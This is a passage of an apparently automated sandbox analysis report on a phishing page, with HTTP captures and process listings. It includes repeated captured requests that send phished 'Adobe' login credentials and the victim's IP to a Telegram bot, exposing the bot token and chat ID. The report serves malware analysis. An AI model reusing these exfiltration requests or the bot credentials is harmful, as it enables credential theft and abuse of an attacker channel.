                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:39 UTC430INHTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:22:39 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4f36d8c40cc8-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1512&rtt_var=592&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=927&delivery_rate=1931216&cwnd=230&unsent_bytes=0&cid=ddf37063bb3043b0&ts=159&x=0"
                                        2025-01-14 17:22:39 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.649831149.154.167.2204436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:39 UTC794OUTGET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:40 UTC388INHTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:22:40 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2025-01-14 17:22:40 UTC478INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 32 32 33 36 36 32 32 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 6b 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 6d 61 78 78 33 35 36 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 33 32 38 34 31 30 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 53 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 68 73 63 6f 72 74 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 38 37 35 33 36 30 2c 22 74 65 78 74 22 3a 22 2a 2a
                                        Data Ascii: {"ok":true,"result":{"message_id":860,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875360,"text":"**


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.649839149.154.167.2204436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:40 UTC584OUTGET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:41 UTC388INHTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:22:41 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2025-01-14 17:22:41 UTC478INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 32 32 33 36 36 32 32 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 6b 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 6d 61 78 78 33 35 36 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 33 32 38 34 31 30 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 53 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 68 73 63 6f 72 74 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 38 37 35 33 36 31 2c 22 74 65 78 74 22 3a 22 2a 2a
                                        Data Ascii: {"ok":true,"result":{"message_id":861,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875361,"text":"**


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.649909104.26.12.2054436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:51 UTC559OUTGET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:51 UTC463INHTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:22:51 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4f7e8d7c42f8-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1610&rtt_var=614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1137&delivery_rate=1765417&cwnd=234&unsent_bytes=0&cid=4059c597a2ee55cb&ts=169&x=0"
                                        2025-01-14 17:22:51 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.649912104.26.12.2054436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:51 UTC349OUTGET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:51 UTC430INHTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:22:51 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4f825df843b6-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=2421&min_rtt=2404&rtt_var=914&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=927&delivery_rate=1214642&cwnd=227&unsent_bytes=0&cid=b0b5b072e39cb00b&ts=137&x=0"
                                        2025-01-14 17:22:51 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.649911149.154.167.2204436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:51 UTC794OUTGET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:52 UTC388INHTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:22:52 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2025-01-14 17:22:52 UTC478INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 32 32 33 36 36 32 32 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 6b 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 6d 61 78 78 33 35 36 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 33 32 38 34 31 30 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 53 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 68 73 63 6f 72 74 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 38 37 35 33 37 32 2c 22 74 65 78 74 22 3a 22 2a 2a
                                        Data Ascii: {"ok":true,"result":{"message_id":862,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875372,"text":"**


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.649918149.154.167.2204436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:52 UTC584OUTGET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:53 UTC388INHTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:22:53 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2025-01-14 17:22:53 UTC478INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 32 32 33 36 36 32 32 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 6b 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 6d 61 78 78 33 35 36 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 33 32 38 34 31 30 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 53 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 68 73 63 6f 72 74 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 38 37 35 33 37 33 2c 22 74 65 78 74 22 3a 22 2a 2a
                                        Data Ascii: {"ok":true,"result":{"message_id":863,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875373,"text":"**


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.650000104.26.12.2054436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:23:06 UTC559OUTGET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:23:06 UTC463INHTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:23:06 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4fdceb236a53-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1582&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1137&delivery_rate=1845764&cwnd=222&unsent_bytes=0&cid=86fe487d4f57cb3d&ts=191&x=0"
                                        2025-01-14 17:23:06 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.650005104.26.12.2054436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:23:06 UTC349OUTGET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:23:07 UTC431INHTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:23:07 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4fe11bd541df-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=8922&min_rtt=1663&rtt_var=5083&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=927&delivery_rate=1755862&cwnd=252&unsent_bytes=0&cid=4b389b4de768c7b8&ts=175&x=0"
                                        2025-01-14 17:23:07 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.650004149.154.167.2204436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:23:07 UTC794OUTGET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:23:07 UTC388INHTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:23:07 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2025-01-14 17:23:07 UTC478INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 32 32 33 36 36 32 32 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 6b 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 6d 61 78 78 33 35 36 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 33 32 38 34 31 30 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 53 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 68 73 63 6f 72 74 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 38 37 35 33 38 37 2c 22 74 65 78 74 22 3a 22 2a 2a
                                        Data Ascii: {"ok":true,"result":{"message_id":864,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875387,"text":"**


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.650006149.154.167.2204436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:23:08 UTC584OUTGET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:23:08 UTC388INHTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:23:08 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2025-01-14 17:23:08 UTC478INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 32 32 33 36 36 32 32 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 6b 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 6d 61 78 78 33 35 36 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 33 32 38 34 31 30 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 53 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 68 73 63 6f 72 74 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 38 37 35 33 38 38 2c 22 74 65 78 74 22 3a 22 2a 2a
                                        Data Ascii: {"ok":true,"result":{"message_id":865,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875388,"text":"**


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:1
                                        Start time:12:22:11
                                        Start date:14/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                        Imagebase:0x7ff684c40000
                                        File size:3'242'272 bytes
                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:3
                                        Start time:12:22:16
                                        Start date:14/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,1981881385979211426,8084460944875189349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                        Imagebase:0x7ff684c40000
                                        File size:3'242'272 bytes
                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:4
                                        Start time:12:22:22
                                        Start date:14/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://savory-sweet-felidae-psrnd.glitch.me/"
                                        Imagebase:0x7ff684c40000
                                        File size:3'242'272 bytes
                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Disassembly

                                        No disassembly